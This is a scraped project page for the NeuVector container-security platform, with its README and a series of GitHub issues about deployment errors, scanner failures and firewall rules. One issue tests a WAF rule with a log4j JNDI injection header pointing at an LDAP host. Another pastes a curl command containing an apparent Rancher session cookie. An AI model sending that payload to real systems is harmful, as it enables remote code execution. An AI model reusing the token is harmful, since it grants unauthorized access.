Code Monkey home page Code Monkey logo

neuvector's Introduction

NeuVector

NeuVector Full Lifecycle Container Security Platform delivers the only cloud-native security with uncompromising end-to-end protection from DevOps vulnerability protection to automated run-time security, and featuring a true Layer 7 container firewall.

A viewable version of docs can be seen at https://open-docs.neuvector.com.

The images are on the NeuVector Docker Hub registry. Use the appropriate version tag for the manager, controller, enforcer, and leave the version as 'latest' for scanner and updater. For example:

  • neuvector/manager:5.0.0
  • neuvector/controller:5.0.0
  • neuvector/enforcer:5.0.0
  • neuvector/scanner:latest
  • neuvector/updater:latest

Note: Deploying from the Rancher Manager 2.6.5+ NeuVector chart pulls from the rancher-mirrored repo and deploys into the cattle-neuvector-system namespace.

License

Copyright © 2016-2022 NeuVector Inc. All Rights Reserved

Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

neuvector's People

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

neuvector's Issues

Cannot Import CRD with address selector

Environment
Platform: Kubernetes EKS
Kubernetes/Platform Version(s): v1.21.5-eks-bc4871b
NeuVector version: v5.0.0-preview.2

Describe the bug
Importing a CRD that includes an address selector under an NVClusterSecurityRule always fails with Import failed : Group Policy Rule format error: Group Google-group with address criterion cannot have WAF policy. This is true with a directly exported yaml file and with a modified one where the waf key is deleted.

To Reproduce

  1. Create a new group with an address=google.com criteria
  2. Export that group
  3. Import the newly exported file
  4. Error
  5. Remove waf key as directed
  6. Import modified file
  7. Error

Expected behavior
A freshly exported file should be importable without modification or at least have an error that applies to the problem in the file.

[UI] Cannot change default password

Default password for the admin user is 5 characters, admin
Default password profile requires min 6 characters.
When I try to change the default password from the manager, UI "validates" the current password against the password profile and gives an error and the "Update Profile" button is grayed out.

6 character(s) minimum.

Workaround: Update the password profile to accept 5 characters.

I'd recommend, either change the default password profile, or disable the form validation for the Current Password field in Edit Profile view. I believe the form should not validate the current password before it is sent to server.

process profile rules are not applied to labels

Environment
Platform: rancher
Kubernetes/Platform Version(s): 1.21

Description

When using the feature to apply rules to labels, they don't apply. For example, process rules consistently don't do anything when applied to a label group, they only work on the services direct group.
The same issues seems to exist for network rules as well if the rule goes from the same group to the same group. So for example you match your group of services with a single label and have an overall rule between them that they can communicate on PORT xyz, still security events are coming up and neuvector also starts blocking traffic, however weirdly not immediately.

How to build the corresponding enforcer and Controller containers?

Is your feature request related to a problem? Please describe.
How to build the corresponding image based on the dockerfile under the build file in the source code, what is 10.1.127.12:5000 in the dockerfile?
Describe the solution you'd like
There is a straightforward Dockerfile file that allows me to quickly build corresponding images or give a brief description of existing Dockerfiles

false-positive with log4j CVE-2021-44228 vulnerability in Docker image

  1. out team use docker image - opensearchproject/opensearch tag 1.2.4
    NeuVector found CVE-2021-44228 (log4j-core) vulnerable package in docker-image - /usr/share/opensearch/plugins/opensearch-sql/druid-1.0.15.jar (imacted version 2.3, fixed version 2.15.0).

on MVNrepository i found this package - https://mvnrepository.com/artifact/com.alibaba/druid/1.0.15 and used version 2.3 actually is vulnerable to log4j-core (cve-2021-44228).

after that we made sure, that our running container has this packer inside self and copied this druid JAR package to host machine.
then we unpack JAR package to java class files, and found pom.xml file with depencies.
In depencies file we found mention of vulnerable log4j-core lib, but there is no any binary log4j package inside it.

inside containter we found not vulnerable log4j-core JAR package (2.17.1).

That's why it seem to us that it's false-positive

  1. same docker-image and then running container: we found glibc-2.26-56.amzn2.x86_64 and according to ALAS2-2022-1736 this version is vulnerable to CVE-2021-33574.
    NeuVector didn't find it.

we use NeuVector v5.0.0-preview1

network rule collection

i just read the source code of agent, and the logic of network control was related with DP, according to the dp package, the network policy was written into the dp_policy_handler, but the monitoring logic seems lost, cause there should be a local loop detection of the network traffic , when a new traffic comes in and out, the monitor progaram should match the traffic with the dp_policy_handler, and if not match, it should return a deny action. So can someone elaborate it for me, and it do confuse me a lot?
Here is the logic graph i draw from the code:
image

we found some Problem with time output

Environment
Platform: Kubernetes
Kubernetes/Platform Version(s): v1.21

Describe the bug
we found some Problem with time output

logs:
docker logs -f 5bce0104e740|more
2022-03-08T10:34:48|MON|/usr/local/bin/monitor starts, pid=4121173
net.core.somaxconn = 1024
net.unix.max_dgram_qlen = 64
Check TC kernel module ...
TC module located
2022-03-08T10:34:48|MON|Start dp, pid=4121245
2022-03-08T10:34:48|MON|Start agent, pid=4121246
1970-01-01T00:00:00|DEBU||dpi_dlp_init: enter
1970-01-01T00:00:00|DEBU||dpi_dlp_register_options: enter
1970-01-01T00:00:00|DEBU||net_run: enter

Rancher Continous Delivery

Is your feature request related to a problem? Please describe.
This is maybe a request for documentation rather than a feature request

Describe the solution you'd like
Rancher Continuous Delivery (Fleet) has a few challenges when it comes to discovery and protection.
It would be nice to have documentation on how to handle fleet deployments
Every new commit to gitrepo will create a new k8s job with a unique name -

Describe alternatives you've considered
I have tried to create a default group matching on namespace fleet-local/and fleet-default and giving process rules and network policies but it seem I cannot get it working 100% especially when default new services are in protected mode. security events occurs.

Is there any architecture or design documentation for NeuVector?

Hello, I recently wanted to know the source code of the project NeuVector, but I did not find the relevant architecture or documents that could help me quickly understand the source code of the project. Is there a good document or code architecture diagram that can help me quickly understand the source code of the project?I would appreciate it.

Import of OWASP WAF Core Rules

Is your feature request related to a problem? Please describe.
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]

Ability to import complete set of OWASP WAF Rules

Describe the solution you'd like
A clear and concise description of what you want to happen.

Utility to allowe taking all or a subset of the OWASP Core WAF Ruleset and convert into Neuvector WAF configurations.

Describe alternatives you've considered
A clear and concise description of any alternative solutions or features you've considered.

Manually converting rules

Additional context
Add any other context or screenshots about the feature request here.

OWASP CoreRuleSet: https://github.com/coreruleset/coreruleset

What's the role of Consul in NeuVector?

I can see a lot config about Consul in the source code of Controller, and the logs show that Controller did initialize with the process of Consul set up. All i know is Consul is a open source project which works in service discover and service registry, so what's the relationship between agent in Consul and controller in NeuVector? And how NeuVector make use of the Consul to achieve what kind of purpose?

Security Events - Network activity source

Environment
Rancher RKE/Rancher 2.6.3 HA
nginx fronting Rancher HA cluster, haproxy ingress.
forwarded-for: false on haproxy configmap (use header from downstream proxy)

Describe the bug
Testing WAF rules with log4j rule on rancher:
regex: (?:${[^}]{0,4}${|${(?:jndi|ctx))

In network Activity you will see traffic from correct Client IP.
In Security Events, source is public IP on one of the nodes, not the X-Forwarded

To Reproduce
Steps to reproduce the behavior:

  1. Create a WAF rule with regex shown
  2. Enable on nv.rancher.cattle-system group
  3. curl -I https:// 'X-Api-Token: ${jndi:ldap://192.168.3.2:1389/Basic/Command/Base64/JHtqbmRpOmxkYXA6Ly8=}'
  4. Verify that source on events is node address and client IP in network activity is the forwarded client ip address

Expected behavior
I would expect info on event to be same as network activity.
download packet (from event) shows the correct x-forwarded-for
At least show information about the client IP.

DLP sensor name and rule name

Hi,
it seems there are some limitations to the sensor and rule name length:
sensor name: sensor.malicious.phpfile.upload
rule name: malicious.file.shell.exec.command

dpi_dlp_parse_opts_routine: Dlp rule((null)):(0) has invalid option(name : sensor.malicious.phpfile.upload_nvCtR.malicious.file.shell.exec.command)

If imposing limitations, the web gui should also have this limitations.
I am testing the https://developer.ibm.com/patterns/protect-your-web-application-using-advanced-runtime-container-security/
and saving rules does not work due to the "invalid option name"

I'm am running the 5.0.0 preview versions

Controller is not available ...

The UI error Controller is not available ...
Connection attempt to neuvector-svc-controller.neuvector:10443 failed
class spray.can.Http$ConnectionAttemptFailedException
neuvector-service-controller-fed-master NodePort 10.96.12.183 11443:32147/TCP 58s
neuvector-service-controller-fed-worker NodePort 10.106.96.75 10443:30012/TCP 58s
neuvector-service-rest ClusterIP 10.99.87.68 10443/TCP 15m
neuvector-service-webui NodePort 10.106.235.114 8443:30888/TCP 10m
neuvector-svc-admission-webhook ClusterIP 10.109.91.34 443/TCP 10m
neuvector-svc-controller ClusterIP 10.96.175.118 18300/TCP,18301/TCP,18301/UDP 10m
neuvector-svc-crd-webhook ClusterIP 10.108.210.198 443/TCP 10m
please help me

Misspelling

Under policy/admission controls CONFIGURATION is spelled wrong - CONFIGUATION (missing the r). The modal that pops up has the same misspelling.
Screen Shot 2022-03-30 at 15 28 16

View data stored in Consul

Hello, I want to check the data stored in Consul, but it is found to be internally started. Is there any way for me to check the data stored in Consul? It would be nice if you could see the UI, thank you very much!

Failed to get container

After using the helm chart provided in Rancher and modifying the following values to include the 5.0.0 preview versions, all controller (3) and enforcer (1) pods won't start:
kubectl get all -n neuvector
NAME READY STATUS RESTARTS AGE
pod/neuvector-controller-pod-8576986c7f-2hk5v 0/1 CrashLoopBackOff 3 86s
pod/neuvector-controller-pod-8576986c7f-mmgtg 0/1 CrashLoopBackOff 3 85s
pod/neuvector-controller-pod-8576986c7f-xj5bx 0/1 CrashLoopBackOff 3 85s
pod/neuvector-enforcer-pod-kbhzj 0/1 CrashLoopBackOff 3 78s
pod/neuvector-manager-pod-798c7bb866-bsjrk 1/1 Running 0 67m
pod/neuvector-scanner-pod-5b94c54657-9bvmw 1/1 Running 0 67m
pod/neuvector-scanner-pod-5b94c54657-frfxw 1/1 Running 0 67m
pod/neuvector-scanner-pod-5b94c54657-wbtmp 1/1 Running 0 67m

NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
service/neuvector-service-webui ClusterIP 10.43.165.209 8443/TCP 67m
service/neuvector-svc-admission-webhook ClusterIP 10.43.100.58 443/TCP 67m
service/neuvector-svc-controller ClusterIP None 18300/TCP,18301/TCP,18301/UDP 67m

NAME DESIRED CURRENT READY UP-TO-DATE AVAILABLE NODE SELECTOR AGE
daemonset.apps/neuvector-enforcer-pod 1 1 0 1 0 67m

NAME READY UP-TO-DATE AVAILABLE AGE
deployment.apps/neuvector-controller-pod 0/3 3 0 67m
deployment.apps/neuvector-manager-pod 1/1 1 1 67m
deployment.apps/neuvector-scanner-pod 3/3 3 3 67m

NAME DESIRED CURRENT READY AGE
replicaset.apps/neuvector-controller-pod-8576986c7f 3 3 0 67m
replicaset.apps/neuvector-manager-pod-798c7bb866 1 1 1 67m
replicaset.apps/neuvector-scanner-pod-5b94c54657 3 3 3 67m

NAME SCHEDULE SUSPEND ACTIVE LAST SCHEDULE AGE
cronjob.batch/neuvector-updater-pod 0 0 * * * False 0 67m

Here is what I get from the enforcer logs:

2022-01-27T03:26:39.009|ERRO|AGT|container.(*containerdDriver).GetContainer: Failed to get container - error=container "751738dadbb7dc1e484dfbfed4fe9b9c222ca8c247b06d6bad51819bbc322c51" in namespace "k8s.io": not found

Thu, Jan 27 2022 4:26:39 am | 2022-01-27T03:26:39.009|ERRO|AGT|main.main: Failed to get local device information - error=not found
Thu, Jan 27 2022 4:26:39 am | github.com/neuvector/neuvector/vendor/github.com/containerd/containerd/errdefs.init
Thu, Jan 27 2022 4:26:39 am | /go/src/github.com/neuvector/neuvector/vendor/github.com/containerd/containerd/errdefs/errors.go:41
Thu, Jan 27 2022 4:26:39 am | runtime.doInit
Thu, Jan 27 2022 4:26:39 am | /usr/local/go/src/runtime/proc.go:5480
Thu, Jan 27 2022 4:26:39 am | runtime.doInit
Thu, Jan 27 2022 4:26:39 am | /usr/local/go/src/runtime/proc.go:5475
Thu, Jan 27 2022 4:26:39 am | runtime.doInit
Thu, Jan 27 2022 4:26:39 am | /usr/local/go/src/runtime/proc.go:5475
Thu, Jan 27 2022 4:26:39 am | runtime.doInit
Thu, Jan 27 2022 4:26:39 am | /usr/local/go/src/runtime/proc.go:5475
Thu, Jan 27 2022 4:26:39 am | runtime.doInit
Thu, Jan 27 2022 4:26:39 am | /usr/local/go/src/runtime/proc.go:5475
Thu, Jan 27 2022 4:26:39 am | runtime.doInit
Thu, Jan 27 2022 4:26:39 am | /usr/local/go/src/runtime/proc.go:5475
Thu, Jan 27 2022 4:26:39 am | runtime.doInit
Thu, Jan 27 2022 4:26:39 am | /usr/local/go/src/runtime/proc.go:5475
Thu, Jan 27 2022 4:26:39 am | runtime.main
Thu, Jan 27 2022 4:26:39 am | /usr/local/go/src/runtime/proc.go:190
Thu, Jan 27 2022 4:26:39 am | runtime.goexit
Thu, Jan 27 2022 4:26:39 am | /usr/local/go/src/runtime/asm_amd64.s:1373
Thu, Jan 27 2022 4:26:39 am | container "751738dadbb7dc1e484dfbfed4fe9b9c222ca8c247b06d6bad51819bbc322c51" in namespace "k8s.io"
Thu, Jan 27 2022 4:26:39 am | github.com/neuvector/neuvector/vendor/github.com/containerd/containerd/errdefs.FromGRPC
Thu, Jan 27 2022 4:26:39 am | /go/src/github.com/neuvector/neuvector/vendor/github.com/containerd/containerd/errdefs/grpc.go:98
Thu, Jan 27 2022 4:26:39 am | github.com/neuvector/neuvector/vendor/github.com/containerd/containerd.(*remoteContainers).Get
Thu, Jan 27 2022 4:26:39 am | /go/src/github.com/neuvector/neuvector/vendor/github.com/containerd/containerd/containerstore.go:50
Thu, Jan 27 2022 4:26:39 am | github.com/neuvector/neuvector/vendor/github.com/containerd/containerd.(*Client).LoadContainer
Thu, Jan 27 2022 4:26:39 am | /go/src/github.com/neuvector/neuvector/vendor/github.com/containerd/containerd/client.go:248
Thu, Jan 27 2022 4:26:39 am | github.com/neuvector/neuvector/share/container.(*containerdDriver).GetContainer
Thu, Jan 27 2022 4:26:39 am | /go/src/github.com/neuvector/neuvector/share/container/containerd.go:294
Thu, Jan 27 2022 4:26:39 am | github.com/neuvector/neuvector/share/container.getDevice
Thu, Jan 27 2022 4:26:39 am | /go/src/github.com/neuvector/neuvector/share/container/common.go:191
Thu, Jan 27 2022 4:26:39 am | github.com/neuvector/neuvector/share/container.(*containerdDriver).GetDevice
Thu, Jan 27 2022 4:26:39 am | /go/src/github.com/neuvector/neuvector/share/container/containerd.go:121
Thu, Jan 27 2022 4:26:39 am | main.getLocalInfo
Thu, Jan 27 2022 4:26:39 am | /go/src/github.com/neuvector/neuvector/agent/agent.go:105
Thu, Jan 27 2022 4:26:39 am | main.main
Thu, Jan 27 2022 4:26:39 am | /go/src/github.com/neuvector/neuvector/agent/agent.go:361
Thu, Jan 27 2022 4:26:39 am | runtime.main
Thu, Jan 27 2022 4:26:39 am | /usr/local/go/src/runtime/proc.go:203
Thu, Jan 27 2022 4:26:39 am | runtime.goexit
Thu, Jan 27 2022 4:26:39 am | /usr/local/go/src/runtime/asm_amd64.s:1373
Thu, Jan 27 2022 4:26:39 am | 2022-01-27T03:26:39|MON|Process agent exit status 254, pid=1624724
Thu, Jan 27 2022 4:26:39 am | 2022-01-27T03:26:39|MON|Process agent exit with non-recoverable return code. Monitor Exit!!
Thu, Jan 27 2022 4:26:39 am | 2022-01-27T03:26:39|MON|Kill dp with signal 15, pid=1624723
Thu, Jan 27 2022 4:26:39 am | 2022-01-27T03:26:38|DEBU|dp0|dp_data_thr: dp thread exits
Thu, Jan 27 2022 4:26:39 am | Leave the cluster
Thu, Jan 27 2022 4:26:39 am | Error leaving: Put http://127.0.0.1:8500/v1/agent/leave: dial tcp 127.0.0.1:8500: connect: connection refused
Thu, Jan 27 2022 4:26:39 am | 2022-01-27T03:26:39|MON|Clean up.

If I describe the container, the ID seems to add up:

kubectl describe pod/neuvector-enforcer-pod-kbhzj -n neuvector
...
Controlled By: DaemonSet/neuvector-enforcer-pod
Containers:
neuvector-enforcer-pod:
Container ID: containerd://751738dadbb7dc1e484dfbfed4fe9b9c222ca8c247b06d6bad51819bbc322c51
Image: docker.io/neuvector/enforcer.preview:5.0.0-preview.1
Image ID: docker.io/neuvector/enforcer.preview@sha256:3997f1323b6a5f49a57156388b5de0261a048d49d202402d954d49af2f1d4a30
Port:
Host Port:
State: Waiting
Reason: CrashLoopBackOff
Last State: Terminated
Reason: Error
Exit Code: 254
Started: Thu, 27 Jan 2022 03:26:38 +0000
Finished: Thu, 27 Jan 2022 03:26:39 +0000
Ready: False
Restart Count: 7
Environment:
CLUSTER_JOIN_ADDR: neuvector-svc-controller.neuvector
CLUSTER_ADVERTISED_ADDR: (v1:status.podIP)
CLUSTER_BIND_ADDR: (v1:status.podIP)
Mounts:
/host/cgroup from cgroup-vol (ro)
/host/proc from proc-vol (ro)
/lib/modules from modules-vol (ro)
/var/run/containerd/containerd.sock from runtime-sock (ro)
/var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-5f9ps (ro)
...

Given the error, it seems to look for the container in "k8s.io" namespace, which I don't have.

bug: resources can't allow themself access (firewall)

Environment
Platform: rancher
Kubernetes/Platform Version(s): 1.21

Describe the bug

When you permit a statefulset to access a port on all other members on the statefulset, the rule will still be raised as an exception by neuvector. It is not possible to define working rules that target a resources own subresources.

example

image

Scanner not working - ERRO|SCN|main.(*Tasker).Run: Done - error=exit status 2

Environment
Platform: Rancher v2.6.3
Kubernetes/Platform Version(s): RKE 2 (v1.21.9+rke2r1)
OS: SLES 15 SP3
NeuVector: 5.0.0-preview.2

Describe the bug
I installed NeuVector via Helm Chart and a private registry.
So far everything works quite well and all features of NeuVector works as expected with one exeption:
The scanner is not working.

All Pods are in "Running state" and everything looks good so far:

kubectl get pods -n neuvector
NAME                                        READY   STATUS    RESTARTS   AGE
neuvector-controller-pod-787578844b-p4nlw   1/1     Running   0          4m25s
neuvector-controller-pod-787578844b-tbzk4   1/1     Running   0          4m25s
neuvector-controller-pod-787578844b-xqtzw   1/1     Running   0          4m25s
neuvector-enforcer-pod-6gckg                1/1     Running   0          4m25s
neuvector-enforcer-pod-bdrph                1/1     Running   0          4m25s
neuvector-enforcer-pod-tl5g8                1/1     Running   0          4m25s
neuvector-manager-pod-6cf449ccdb-rrjxd      1/1     Running   0          4m25s
neuvector-scanner-pod-6487bdcb78-mfnl8      1/1     Running   0          4m25s
neuvector-scanner-pod-6487bdcb78-t5hrz      1/1     Running   0          4m25s
neuvector-scanner-pod-6487bdcb78-tkgmc      1/1     Running   0          4m25s

But when we try to start a scan, the scan fails.

Output of the scan logs is like:

2022-03-11T13:07:37.553|DEBU|SCN|main.(*rpcService).ScanAppPackage: - Packages=[AppName:"kubernetes" ModuleName:"kubernetes" Version:"1.21.9+rke2r1" FileName:"kubernetes" ]
2022-03-11T13:07:37.554|DEBU|SCN|main.(*Tasker).Run:
2022-03-11T13:07:37.555|DEBU|SCN|main.(*Tasker).Run: - args=[-t pkg -i /tmp/2a97687a-cedc-42bb-9df5-872adbf9334e_i.json -o /tmp/2a97687a-cedc-42bb-9df5-872adbf9334e_o.json] cmd=/usr/local/bin/scannerTask wpath=/tmp/images/2a97687a-cedc-42bb-9df5-872adbf9334e
2022-03-11T13:07:37.58 |INFO|SCT|system.NewSystemTools: cgroup v1
2022-03-11T13:07:37.58 |DEBU|SCT|main.main: - imageWorkingPath=/tmp/images/2a97687a-cedc-42bb-9df5-872adbf9334e
---usage: scannerTask [OPTIONS]
  -i string
    	input json name (default "input.json")
  -o string
    	output json name (default "result.json")
  -t string
    	scan type: reg, pkg, dat or awl (Required)
  -u string
    	Container socket URL
2022-03-11T13:07:37.583|ERRO|SCN|main.(*Tasker).Run: Done - error=exit status 2

To Reproduce
Steps to reproduce the behavior:

  1. Install NeuVector
  2. Start a Scan (f.e. to OCI Image or K8S Cluster)

Expected behavior

  • A clear log / message pointing to the root cause.

Updater can not update successful

Hi
I try to update neuvector CVE DB,but can not successful, updater cron job prompt :
ImagePullBackOff and ErrImagePull
The events as following:
Events:
Type Reason Age From Message


Normal Scheduled 2m Successfully assigned neuvector/neuvector-updater-pod-1645902120-fsrzj to node01.localdomain
Warning Failed 119s kubelet, node01.localdomain Failed to pull image "registry.neuvector.com/updater": rpc error: code = Unknown desc = Error response from daemon: Get https://registry.neuvector.com/v2/: read tcp 192.168.2.161:58592->34.120.39.14:443: read: connection reset by peer
Warning Failed 104s kubelet, node01.localdomain Failed to pull image "registry.neuvector.com/updater": rpc error: code = Unknown desc = Error response from daemon: Get https://registry.neuvector.com/v2/: read tcp 192.168.2.161:58650->34.120.39.14:443: read: connection reset by peer
Warning Failed 69s kubelet, node01.localdomain Failed to pull image "registry.neuvector.com/updater": rpc error: code = Unknown desc = Error response from daemon: Get https://registry.neuvector.com/v2/updater/manifests/latest: Get https://registry.neuvector.com/_token?scope=repository%3Aupdater%3Apull: read tcp 192.168.2.161:58746->34.120.39.14:443: read: connection reset by peer
Normal Pulling 23s (x4 over 119s) kubelet, node01.localdomain Pulling image "registry.neuvector.com/updater"
Warning Failed 21s (x4 over 119s) kubelet, node01.localdomain Error: ErrImagePull
Warning Failed 21s kubelet, node01.localdomain Failed to pull image "registry.neuvector.com/updater": rpc error: code = Unknown desc = Error response from daemon: Get https://registry.neuvector.com/v2/updater/manifests/latest: denied: Permission "artifactregistry.repositories.downloadArtifacts" denied on resource "projects/neuvector-cloud-live-292322/locations/us/repositories/neuvector-us" (or it may not exist)
Normal BackOff 10s (x6 over 118s) kubelet, node01.localdomain Back-off pulling image "registry.neuvector.com/updater"
Warning Failed 10s (x6 over 118s) kubelet, node01.localdomain Error: ImagePullBackOff

Cilium support

Hi, I’m trying out neuvector for different types of CNI’s.
Canal/Calico is working fine but I cannot get it to work using cilium.
After discovery, if I put a container in protected mode, traffic is blocked. Network rules are correct.
How could I debug this issue? Maybe ebpf related?

Usage of the agent

I have read the docs about the neuvector and the architecture of the whole system, but according to the source code, besides the scanner, controller and upgrader, there is another component named agent which is not mentioned in the docs, so i wonder if someone can help me explain or show me some reference material about this part, I'll be appreciated.

ingress and x-forwarded-headers

Hi,
Im working on verifying the usage of x-forwarded-headers and trafficpolicy.
Current setup:
purelb loadbalancer
nginx ingress: externaltrafficpolicy: Cluster
workload: ealen/echo-server
Neuvector 5.0.0.preview
RKE2 (v1.21.9+rke2r1)
calico (VXLANCrossSubnet)

As my understanding of the documentation, neuvector should regard the X-Forwarded-For headers and traffic would appear as coming from external.
However, traffic is shown as coming from ingress pod.
Headers are added from nginx-ingress to the pod.

I can do further debugging if you can guide me to any cli commands.

br hw

Edit:
checking cli: show conversation
Host -> echo-server: xff_entry: True
Ingress -> echo server: xff_entry: None

Can't load dashboard: Request is missing required HTTP header 'Token'

Hi!

I'm running the preview version of neuvector (5.0.0) and deployed it on a RKE2 cluster via Rancher 2.6 charts (with modifications). All pods and services are running correctly with no errors.

I access the dashboard by clicking the service, I login with the default credentials and then read + accept the EULA. The dashboard almost fully loads and at the end it throws the following error (it's the only thing I can see):

Request is missing required HTTP header 'Token'

Console log:

`
DevTools failed to load source map: Could not load content for https://REDACTED_HOSTNAME/api/v1/namespaces/neuvector/services/https:neuvector-service-webui:8443/proxy/vendor-e8113a58f6b1c806aaf277cb2565c93e.map: HTTP error: status code 400, net::ERR_HTTP_RESPONSE_CODE_FAILURE

​ Uncaught SyntaxError: Unexpected token < in JSON at position 0

​ GET https://REDACTED_HOSTNAME/api/v1/namespaces/neuvector/services/https:neuvector-service-webui:8443/proxy/index.html/app/dashboard?v=7483daf7b7 400
`

Request that failed (there is around 10 tries for the same URL) copied as curl from browser network capture:

curl "https://REDACTED_HOSTNAME/api/v1/namespaces/neuvector/services/https:neuvector-service-webui:8443/proxy/index.html/app/dashboard?v=7483daf7b7" ^ -H "authority: REDACTED_HOSTNAME" ^ -H "sec-ch-ua: ^\^" Not;A Brand^\^";v=^\^"99^\^", ^\^"Google Chrome^\^";v=^\^"97^\^", ^\^"Chromium^\^";v=^\^"97^\^"" ^ -H "sec-ch-ua-mobile: ?0" ^ -H "sec-ch-ua-platform: ^\^"Windows^\^"" ^ -H "upgrade-insecure-requests: 1" ^ -H "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36" ^ -H "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" ^ -H "sec-fetch-site: same-origin" ^ -H "sec-fetch-mode: navigate" ^ -H "sec-fetch-dest: document" ^ -H "referer: https://REDACTED_HOSTNAME/api/v1/namespaces/neuvector/services/https:neuvector-service-webui:8443/proxy/index.html?v=7483daf7b7" ^ -H "accept-language: en-US,en;q=0.9" ^ -H "cookie: R_PCS=light; R_LOCALE=en-us; R_THEME=dark; R_REDIRECTED=true; CSRF=d75778f767; R_SESS=token-xlzjh:kr27wfwr76qlmz2ncgh5d6fszgh47l2mj72fjv2wmzngwq579dpkz7" ^ --compressed

Response is a 400 Bad Request:

cache-control: no-cache, private content-length: 47 content-type: text/plain; charset=UTF-8 date: Thu, 03 Feb 2022 16:59:39 GMT strict-transport-security: max-age=15724800; includeSubDomains x-api-cattle-auth: true x-content-type-options: nosniff

I can't seem to get the ingress controller working to test it via ingress:

`
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
annotations:
field.cattle.io/publicEndpoints: '[{"addresses":["REDACTED_IP"],"port":443,"protocol":"HTTPS","serviceName":"neuvector:neuvector-service-webui","ingressName":"neuvector:nv-web-ui","hostname":"REDACTED_HOSTNAME","path":"/","allNodes":false}]'
creationTimestamp: "2022-02-03T16:28:37Z"
generation: 4
managedFields:

  • apiVersion: networking.k8s.io/v1
    fieldsType: FieldsV1
    fieldsV1:
    f:spec:
    f:rules: {}
    f:tls: {}
    manager: rancher
    operation: Update
    time: "2022-02-03T16:28:37Z"
  • apiVersion: networking.k8s.io/v1
    fieldsType: FieldsV1
    fieldsV1:
    f:status:
    f:loadBalancer:
    f:ingress: {}
    manager: nginx-ingress-controller
    operation: Update
    time: "2022-02-03T16:29:21Z"
  • apiVersion: extensions/v1beta1
    fieldsType: FieldsV1
    fieldsV1:
    f:metadata:
    f:annotations:
    .: {}
    f:field.cattle.io/publicEndpoints: {}
    manager: rancher
    operation: Update
    time: "2022-02-03T16:29:21Z"
    name: nv-web-ui
    namespace: neuvector
    resourceVersion: "19950782"
    uid: 2b408b8d-f18e-4896-9bc0-4bd051ddb160
    spec:
    rules:
  • host: REDACTED_HOST
    http:
    paths:
    • backend:
      service:
      name: neuvector-service-webui
      port:
      number: 8443
      path: /
      pathType: Prefix
      tls:
  • hosts:
    • REDACTED_HOST
      secretName: nv-web-cert
      status:
      loadBalancer:
      ingress:
    • ip: REDACTED_IP
      `

Any clues on what might be wrong?
Thanks!

Neuvector appears to run under minikube but not KinD

Environment
Platform: [e.g. Kubernetes, OpenShift, Rancher, Managed k8s (AKS, EKS, GKE, IKS, ...), ...]
Kubernetes/Platform Version(s):

Podman 4.0.2
kind v0.12.0 go1.17.6 darwin/arm64
Kubernetes 1.23.4

Describe the bug
A clear and concise description of what the bug is. (If you are encountering a deployment error, check out the README or navigate to https://open-docs.neuvector.com for full deployment documentation. Incorrect runtime is the most common reason for Controller and Enforcer CrashLoopBackOff events.)

Neuvector fails to start with the following errors:

2022-04-02T00:28:06.362|INFO|AGT|main.main: START - version=v5.0.0-preview.3
2022-04-02T00:28:06.366|INFO|AGT|main.main: - bind=10.240.162.144
2022-04-02T00:28:06.376|INFO|AGT|system.NewSystemTools: cgroup v2
2022-04-02T00:28:06.376|INFO|AGT|container.Connect: - endpoint=
2022-04-02T00:28:06.376|ERRO|AGT|main.main: Failed to initialize - error=Unknown container runtime

It looks like from the code that it may be failing on the check for UNIX Socket as for podman this (/var/run/docker.sock) is a symbolic link file and the current code checks for this being a socket file (via UNIX stat). Stat of file on file system show a type of symbolic link:

stat /var/run/docker.sock
File: /var/run/docker.sock -> /run/podman/podman.sock
Size: 23 Blocks: 0 IO Block: 4096 symbolic link
Device: 1ch/28d Inode: 940 Links: 1
Access: (0777/lrwxrwxrwx) Uid: ( 0/ root) Gid: ( 0/ root)
Context: system_u:object_r:var_run_t:s0
Access: 2022-04-01 21:15:04.101455929 -0400
Modify: 2022-04-01 19:41:05.180000001 -0400
Change: 2022-04-01 19:41:05.180000001 -0400
Birth: -

stat /run/podman/podman.sock
File: /run/podman/podman.sock
Size: 0 Blocks: 0 IO Block: 4096 socket
Device: 1ch/28d Inode: 971 Links: 1
Access: (0660/srw-rw----) Uid: ( 0/ root) Gid: ( 0/ root)
Context: system_u:object_r:var_run_t:s0
Access: 2022-04-01 20:22:15.932986012 -0400
Modify: 2022-04-01 19:41:05.230000001 -0400
Change: 2022-04-01 19:41:05.230000001 -0400
Birth: -

Switching mount point in init config does not seem to resolve.

   - name: docker-sock
      hostPath:
        path: /run/podman/podman.sock

To Reproduce
Steps to reproduce the behavior:

  1. Go to '...'
  2. Click on '....'
  3. Scroll down to '....'
  4. See error

Spin up KinD cluster under podman. Appear config for Neuvector as if for Docker container runtime. Controller and enforcer fail to start and remain in CrashLoopBackoff.

Expected behavior
A clear and concise description of what you expected to happen.

